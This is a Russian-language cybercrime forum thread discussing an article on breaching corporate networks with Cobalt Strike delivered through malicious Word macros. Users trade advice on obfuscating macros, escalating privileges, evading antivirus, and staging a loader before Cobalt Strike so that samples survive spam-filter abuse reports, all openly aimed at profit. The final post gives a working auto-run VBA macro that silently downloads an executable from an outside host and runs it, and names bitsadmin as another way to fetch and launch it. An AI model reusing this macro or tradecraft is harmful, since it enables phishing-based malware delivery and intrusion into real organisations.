Статья Получаем доступ к корпоративным сетям с помощью Cobalt Strike & Макросы Word

[verinice]

никто тебе не даст влезть в реестр если ты не под админом.

да поэтому мне нравится эта статья, что тут описано как сразу делать elevate прав

Криптон молодчага!

 

[verinice]

Злая клиппи уже удрочена,господа,кобальт надо обфусцировать,привелегии надо подымать но если там какой-нить касперский,или нод- то не так все просто)Вообще-то статья хорошая для тех кто начинает осваивать..

Статья отличная, но можно тот же кобальт заменить чем угодно, обфускация кобальту уже не помогает

 

[ColorS]

спустя эволюцию макросов додумались использовать CreateProcess только в 2020 году, а до этого они использовали shell даже при APT векторах и в целом точечной работе, технологии! развиваемся! к сожалению до сих пор считают powershell лучшим из лучших в этом плане, ну ничего! подождем 4 года, Microsoft будет разрешать только подписанные макросы, тогда они поймут

 

[gloritown]

Можно, ну лучше его совсем переписать, старина Рафи уже не удел, PShell-тоже(перписать), жаль эмпайр,забросили - проект. Мб кто знает чела который пилит реализацию павер-шелла? Стукните в личку, вниманием не обделим.

Вот ты мыслишь с позитции как лучше. Лучшее враг хорошего, турецкие школьники досих пор льют анубисa - зарабатывая на хлеб с маслом. Борька вон паблик сплоитом, и изи техникой ложит крупных корпов. Для работяг\трудяг пойдет. И вообще паблик наше все. Кто тут имеет приват-с и воротит нос от фрэймворков\сборок\уже-готового-и-детектящясего? важен же результат и только. На конти глянь, манулы-ёмаё(без-слез-не-взглянешь) , да мимик чист, но и этого не большого набора им вполне хватает на поддержание хорошей статы.
Посмотреть вложение 25532

За Эмпайр теперь BC-Security взялись. Вроде ничего Я тестил всё ок. Посмотри может тебе тоже понравится.

GitHub - BC-SECURITY/Empire: Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. - BC-SECURITY/Empire

github.com

 

[diletant]

спустя эволюцию макросов додумались использовать CreateProcess только в 2020 году, а до этого они использовали shell даже при APT векторах и в целом точечной работе, технологии! развиваемся! к сожалению до сих пор считают powershell лучшим из лучших в этом плане, ну ничего! подождем 4 года, Microsoft будет разрешать только подписанные макросы, тогда они поймут

как заставить половину населения планеты подписывать макросы ?) Я думаю,они оставят это дело на пользователя.Мол сам включишь настройки какие надо

 

[Traffz]

Статья хлам чисто вот по этому:

2) Макросы в Word. Наш вредоносный макрос будет скачивать пэйлоад Powershell созданный в Cobalt Strike

Это как ядерной ракетой по воробьям стрелять.. Щас видимо тренд такой новый, начитаться овердохуя теории и таким же лунтикам советы раздавать...

 

[kaspersky]

Мелкософт будет увеличивать слежку за поголовьем и набивать новые версии сказочной телеметрией,кейлоггерами,отчетами об ошибках,созданием изолированных рабочих областей с 5-тифакторной идентификацией,задрачивать юзеров бесконечными предупреждениями и все-равно их будут трахать дешевыми шифровальщиками и крысами 10-летней давности,ибо лох-не мамонт.Я не верю в сказочное киберимунное будущее,это чисто розовые Женины фантазии.Вылечим всех и от всего)

 

[Krypt0n]

Статья хлам чисто вот по этому:



Это как ядерной ракетой по воробьям стрелять.. Щас видимо тренд такой новый, начитаться овердохуя теории и таким же лунтикам советы раздавать...

Скажи чем ты там обнюхался? Таким же фишингом и действуют пентестеры... Если хочешь эксплойт который стоит дохуя бабла то тебя никто не останавливает. Подумай сам почему на форуме другие же продают эти макросы? Да потому что это эффективно в реальных атаках.

 

[diletant]

Скажи чем ты там обнюхался? Таким же фишингом и действуют пентестеры... Если хочешь эксплойт который стоит дохуя бабла то тебя никто не останавливает. Подумай сам почему на форуме другие же продают эти макросы? Да потому что это эффективно в реальных атаках.

макрос сильно универсален для любой тачки. Больше по этому.

 

[Traffz]

Только школьники теоретики вроде вас грузят кобу через доки)))) нормальные ребята грузят лоадер, фильтруют всякую нечесть и шлак, а уже после шлют отборных ботов на кобу. с лоадера. А вы да, можете прогрузить кобу сразу аттачем и радоваться абузам а не бабкам. Успехов в теории...

 

[liquidator]

Только школьники теоретики вроде вас грузят кобу через доки)))) нормальные ребята грузят лоадер, фильтруют всякую нечесть и шлак, а уже после шлют отборных ботов на кобу. с лоадера. А вы да, можете прогрузить кобу сразу аттачем и радоваться абузам а не бабкам. Успехов в теории...

Тебя клоуна забанили на приеме ты думаешь второй раз проканает)))) школьник здесь ты, если ты действуешь точечно ,то тебе не потребуется фильтровать шлак,клоун

 

[diletant]

Тебя клоуна забанили на приеме ты думаешь второй раз проканает)))) школьник здесь ты, если ты действуешь точечно ,то тебе не потребуется фильтровать шлак,клоун

чего он не так сказал? всё правильно,все по схеме. Сначала лодырь,отсев ловушек,дальше уже удар по реальным юзверям.
Лодырь проще рекриптнуть по быстрому,нежели убивать семплы кобы. Но каждый дрочит как хочет конечно. Я бы еще проверку задал на уровне макроса,чтоб семплы лодыря не улетали в трубу.

 

[Krypt0n]

Только школьники теоретики вроде вас грузят кобу через доки)))) нормальные ребята грузят лоадер, фильтруют всякую нечесть и шлак, а уже после шлют отборных ботов на кобу. с лоадера. А вы да, можете прогрузить кобу сразу аттачем и радоваться абузам а не бабкам. Успехов в теории...

Я не исключал возможность сразу подгружать лодырь. Если ты очень хорошо "прошаренный" чем я, напиши об этом статью, с удовольствием почитаю.

 

[Krypt0n]

Только школьники теоретики вроде вас грузят кобу через доки)))) нормальные ребята грузят лоадер, фильтруют всякую нечесть и шлак, а уже после шлют отборных ботов на кобу. с лоадера. А вы да, можете прогрузить кобу сразу аттачем и радоваться абузам а не бабкам. Успехов в теории...

И вообще я статью писал именно про кобальт и макросы. Никто тебе в здравом уме, не будет давать криптованный лоадер в статьях.

 

[Traffz]

Я же обосновал почему так. Если ты делаешь таргет - базара нет, шли сразу кобу. Но как тогда быть если сессия твоя вдруг отвалится через 2-3 минуты?))) Как ты закрепляться будешь? Я молчу даже про то, что коба твоя после 2-3 таких писем отлетит из за абуз, потому что нормальные спамфильтры тут же сольют эти семплы на анализ.

Никто тебе в здравом уме, не будет давать криптованный лоадер в статьях.

Это как расшифровать?)

 

[horcrux]

подскажите аналоги EvilClippy, за ранее благодарю

 

[xrahitel]

подскажите аналоги EvilClippy, за ранее благодарю

Releases · sevagas/macro_pack

macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments...

github.com

 

[Kytren]

Releases · sevagas/macro_pack

macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments...

github.com

У кого нибудь есть про версия Macro Pack нигде не могу найти...?

 

[Krypt0n]

Это как расшифровать?)

Мозгом.

 

[blackteam007]

это паблик убитый ))

Private Sub Document_New()

End Sub

Private Sub Document_Open()
Call Shell("Cmd /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://disk.karelia.pro/m9UmrQ2/1.jpg','C:\ProgramData\1.exe');Start-Process 'C:\ProgramData\1.exe'")
End Sub

вместо cmd и powershella можно использовать загрузку и запуск через bitsadmin